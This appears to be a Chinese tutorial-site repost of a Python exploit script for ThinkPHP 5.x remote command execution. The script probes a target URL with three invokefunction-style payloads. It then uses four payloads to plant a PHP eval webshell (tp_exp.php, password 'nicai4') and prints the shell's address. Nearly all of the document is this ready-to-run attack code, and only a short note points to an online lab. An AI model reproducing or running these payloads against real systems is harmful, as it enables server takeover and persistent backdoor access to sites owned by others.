thinkphp实战教程之博客技术学习
python3编写ThinkPHP命令执行Getshell的方法加了三个验证漏洞以及四个getshell方法
|
|
# /usr/bin/env python3# -*- coding: utf-8 -*-# @author: morker# @email: [email]admin@nsf.me[/email]# @blog: [url]http://nsf.me/[/url] import requestsimport sys def demo(): print(' _______ _ _ _ _____ _ _ _____ ') print(' |__ __| | (_) | | | __ \| | | | __ \ ') print(' | | | |__ _ _ __ | | _| |__) | |__| | |__) |') print(''' | | | '_ \| | '_ \| |/ / ___/| __ | ___/ ''') print(' | | | | | | | | | | <| | | | | | | ') print(' |_| |_| |_|_|_| |_|_|\_\_| |_| |_|_| ') print() print('\tthinkphp 5.x (v5.0.23 and v5.1.31 following version).') print('\tremote command execution exploit.') print('\tvulnerability verification and getshell.') print('\ttarget: http://target/public') print()class thinkphp(): def __init__(self,web): self.web = web self.headers = { "user-agent" : "mozilla/5.0 (windows nt 10.0; win64; x64; rv:63.0) gecko/20100101 firefox/63.0", "accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "accept-language" : "zh-cn,zh;q=0.8,zh-tw;q=0.7,zh-hk;q=0.5,en-us;q=0.3,en;q=0.2", "accept-encoding" : "gzip, deflate", "content-type" : "application/x-www-form-urlencoded", "connection" : "keep-alive" } def verification(self): i = 0 s = 0 verifications = ['/?s=index/\\think\request/input&filter=phpinfo&data=1','/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1','/?s=index/\\think\container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1'] while true: if i == len(verifications): break else: url = self.web + verifications[i] req = requests.get(url=url,headers=self.headers) if 'phpinfo()' in req.text: s = 1 break else: s = 0 i += 1 if s == 1: print("[+] there are vulnerabilities.") print() toshell = input("[*] getshell? (y/n):") if toshell == 'y': self.getshell() elif toshell == 'n': sys.exit() else: sys.exit() else: print("[-] there are no vulnerabilities.") def getshell(self): getshells = [ '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=tp_exp.php&vars[1][]=<?php @eval($_post[nicai4]); ?>', '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27<?php%20@eval($_post[nicai4]);%20?>%27%20>>%20tp_exp.php', '?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20@eval($_post[nicai4]);%20?^>%20>>tp_exp.php', '?s=index/\\think\\template\driver\\file/write&cachefile=tp_exp.php&content=<?php%20eval($_post[nicai4]);?>'] shell = self.web + '/tp_exp.php' i = 0 s = 0 while true: if i == len(getshells): break else: url = self.web + getshells[i] req = requests.get(url=url,headers=self.headers) req_shell = requests.get(url=shell,headers=self.headers) if req_shell.status_code == 200: s = 1 break else: s = 0 i += 1 if s == 1: print("[+] webshell :%s password :nicai4" % shell) else: print("[-] the vulnerability does not exist or exists waf.") def main(): demo() url = input("[*] please input your target: ") run = thinkphp(url) run.verification() if __name__ == '__main__': main() |
注:图中的测试网址为在线漏洞环境,可自己去在线搭建测试。
环境地址:https://www.vsplate.com/
效果图:
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持开心学习网。
原文链接:https://bbs.ichunqiu.com/thread-48729-1-1.html